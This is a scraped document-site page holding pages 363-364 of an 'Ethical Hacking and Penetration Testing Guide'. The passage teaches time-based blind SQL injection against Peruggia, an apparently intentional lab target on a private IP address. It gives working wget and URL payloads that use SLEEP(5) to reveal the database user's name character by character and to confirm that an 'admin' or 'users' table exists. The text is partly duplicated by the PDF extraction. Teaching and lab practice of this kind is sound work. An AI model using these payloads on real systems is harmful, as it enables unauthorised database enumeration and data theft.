Ethical Hacking and Penetration Testing Guide

Syntax [Asking if the first character is “a”]

Yüklə 22,44 Mb.

Pdf görüntüsü

səhifə	218/235
tarix	07.08.2023
ölçüsü	22,44 Mb.
	#138846

1 ... 214 215 216 217 218 219 220 221 ... 235

Ethical Hacking and Penetration Testing Guide ( PDFDrive )

Guessing the Table Names The next step would obviously be to guess the table names. This can be easily done by executing the following command: Syntax
Syntax [Checking if users table exists]

363
Syntax [Asking if the first character is “a”]
Wget
“http://192.168.75.147/peruggia/index.php?action=comment&pic_id=1 and if(substring
(user(),1,1)=’a’,SLEEP(5),1)--”
Syntax [Asking if the first character is “p”]
Wget
“http://192.168.75.147/peruggia/index.php?action=comment&pic_id=1 and if(substring
(user(),1,1)=’p’,SLEEP(5),1)--”
From the output, we can see that the first query failed and the response was not delayed for 5 s,
which means that the first character of the db user is not equal to “a”; however, we get 5 s delay
with the second query, which means that the first character of db user is “p”. Now you can proceed
by enumerating the remaining characters, and so on.
pic_id=13 and if(substring(user(),2,1)=’a’,SLEEP(5),1)—
pic_id=13 and if(substring(user(),3,1)=’a’,SLEEP(5),1)—
Guessing the Table Names
The next step would obviously be to guess the table names. This can be easily done by executing
the following command:
Syntax
http://192.168.75.147/peruggia/index.php?action=comment&pic_id=13 and IF(SUBSTRING
((select 1 from [Table Name to guess] limit 0,1),1,1)=1,SLEEP(5),1)

364
◾
Ethical Hacking and Penetration Testing Guide
Syntax [Checking if
admin
table exists]
http://192.168.75.147/peruggia/index.php?action=comment&pic_id=13 and IF(SUBSTRING
((select 1 from admin limit 0,1),1,1)=1,SLEEP(5),1)
Syntax [Checking if
users
table exists]
http://192.168.75.147/peruggia/index.php?action=comment&pic_id=13 and IF(SUBSTRING
((select 1 from users limit 0,1),1,1)=1,SLEEP(5),1)
As we can see from the output, there was no delay when executing the first query. However,
there was a 5 s delay when we were trying to guess the table users, which means that the table users
exist in the database.

Yüklə 22,44 Mb.

Dostları ilə paylaş:

1 ... 214 215 216 217 218 219 220 221 ... 235